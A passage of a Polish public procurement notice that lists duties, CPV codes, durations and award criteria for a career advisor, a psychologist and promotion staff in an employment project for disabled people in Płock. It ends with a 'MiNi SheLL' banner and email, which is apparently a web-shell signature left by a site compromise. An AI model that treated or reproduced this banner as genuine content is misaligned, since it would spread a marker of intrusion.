9)	Wprowadzanie danych do Formularza PEFS 2007 dla PO KL.
10)	Prowadzenie działań informacyjno - promocyjnych zgodnie z wytycznymi w tym zakresie. 
11)	Monitoring oznakowania materiałów informacyjno - promocyjnych zgodnie z Wytycznymi MRR dotyczącymi oznaczania projektów w ramach PO KL.
12)	Udzielanie informacji o projekcie - telefonicznie, ustnie, pisemnie lub za pośrednictwem Internetu.
13)	Aktualizowanie informacji o projekcie.
14)	Prowadzenie dokumentacji w zakresie działań informacyjno - promocyjnych.
15)	Sporządzanie miesięcznych sprawozdań z realizacji powierzonych zadań.
16)	Informowanie w formie pisemnej kierownika projektu o wystąpieniu problemów i trudności w realizacji powierzonego zadania.
17)	Współpraca z Kierownikiem projektu oraz z innymi osobami świadczącymi usługi w projekcie.
18)	Udział w spotkaniach zespołu projektowego.
19)	Prowadzenie miesięcznych kart czasu pracy.
20)	Przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5 - Doradca zawodowy w ramach zindywidualizowanego wsparcia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Doradcy zawodowego w ramach zindywidualizowanego wsparcia:
1)	Zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.).
2)	Świadczenie pomocy uczestnikom projektu w wyborze odpowiedniego zawodu, informacji o zawodach, rynku pracy oraz uzyskaniu zatrudnienia.
3)	Wypracowanie Indywidualnego Planu Działania podczas rozmowy doradczej (30 osób niepełnosprawnych zarejestrowanych w MUP w Płocku).
4)	Pozyskiwanie informacji na temat potencjału uczestników projektu, ich sytuacji społeczno - zawodowej, potrzeb, aspiracji, możliwości rozwojowych, a także ukierunkowanie ich do wyboru odpowiedniego kierunku szkolenia.
5)	Pomoc uczestnikom projektu w powrocie na otwarty rynek pracy.
6)	Prowadzenie dokumentacji w zakresie ww. działań.
7)	Współpraca z kierownikiem projektu oraz z innymi osobami świadczącymi usługi w projekcie.
8)	Informowanie w formie pisemnej kierownika projektu o wystąpieniu problemów i trudności w realizacji powierzonego zadania.
9)	Prowadzenie spotkań między godziną 8.00 a 18.00 na podstawie harmonogramu wskazanego przez Zamawiającego, w miejscu wskazanym przez Zamawiającego.
10)	Prowadzenie miesięcznych kart czasu pracy.
11)	Przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6 - Psycholog w ramach zindywidualizowanego wsparcia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zadań Psychologa w ramach zindywidualizowanego wsparcia:
1.	Zapoznanie się z dokumentacją niezbędną przy realizacji projektu (projektową, organizacyjną, itp.).
2.	Udzielanie specjalistycznego poradnictwa psychologicznego.
3.	Udzielanie informacji, wskazówek i pomocy w zakresie rozwiązywania spraw życiowych osobom, które dzięki tej pomocy będą zdolne samodzielnie rozwiązywać problemy będące przyczyną trudnej sytuacji życiowej.
4.	Wspieranie uczestników projektu w zakresie podnoszenia ich kompetencji życiowych i umiejętności społecznych.
5.	Prowadzenie indywidualnych spotkań z uczestnikami projektu Aktywny niepełnosprawny na płockim rynku pracy mających na celu rozpoznanie potrzeb uczestnika.
6.	Prowadzenie dokumentacji z udzielonych porad.
7.	Udział w procesie rekrutacji.
8.	Współpraca z kierownikiem projektu oraz innymi osobami świadczącymi usługi w projekcie oraz Zespołem odpowiedzialnym za realizację ww. projektu.
9.	Prowadzenie spotkań od poniedziałku do piątku, między godziną 8.00 a 18.00 na podstawie harmonogramu wskazanego przez Zamawiającego, w miejscu wskazanym przez Zamawiającego.
10.	Informowanie w formie pisemnej kierownika projektu o wystąpieniu problemów i trudności w realizacji powierzonego zadania.
11.	Prowadzenie miesięcznych kart czasu pracy.
12.	Przygotowywanie po zakończonym miesiącu protokołu odbioru wykonywanej pracy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 17.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com